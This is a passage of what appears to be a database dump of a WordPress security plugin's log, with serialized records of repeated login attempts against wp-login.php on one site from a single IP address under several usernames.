20:21:05'),(95692,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747057610.729965;s:12:\"REQUEST_TIME\";i:1747057610;}}','13.127.208.15',1,'2025-05-12 19:16:52','2025-05-13 20:21:04'),(95693,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747057610.7281909;s:12:\"REQUEST_TIME\";i:1747057610;}}','13.127.208.15',1,'2025-05-12 19:16:52','2025-05-13 20:21:04'),(95694,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747057610.735878;s:12:\"REQUEST_TIME\";i:1747057610;}}','13.127.208.15',1,'2025-05-12 19:16:52','2025-05-13 20:21:04'),(95695,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"118\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"118\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747057610.7290299;s:12:\"REQUEST_TIME\";i:1747057610;}}','13.127.208.15',1,'2025-05-12 19:16:52','2025-05-13 20:21:05'),(95696,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747057983.3123429;s:12:\"REQUEST_TIME\";i:1747057983;}}','13.127.208.15',1,'2025-05-12 19:23:05','2025-05-13 20:21:05'),(95697,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747057983.311605;s:12:\"REQUEST_TIME\";i:1747057983;}}','13.127.208.15',1,'2025-05-12 19:23:05','2025-05-13 20:21:05'),(95698,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747057983.31106;s:12:\"REQUEST_TIME\";i:1747057983;}}','13.127.208.15',1,'2025-05-12 19:23:05','2025-05-13 20:21:04'),(95699,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747057985.0580471;s:12:\"REQUEST_TIME\";i:1747057985;}}','13.127.208.15',1,'2025-05-12 19:23:06','2025-05-13 20:21:04'),(95700,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747057985.1196289;s:12:\"REQUEST_TIME\";i:1747057985;}}','13.127.208.15',1,'2025-05-12 19:23:06','2025-05-13 20:21:04'),(95701,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"125\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"125\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747058352.8725619;s:12:\"REQUEST_TIME\";i:1747058352;}}','13.127.208.15',1,'2025-05-12 19:29:14','2025-05-13 20:21:04'),(95702,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"124\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"124\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";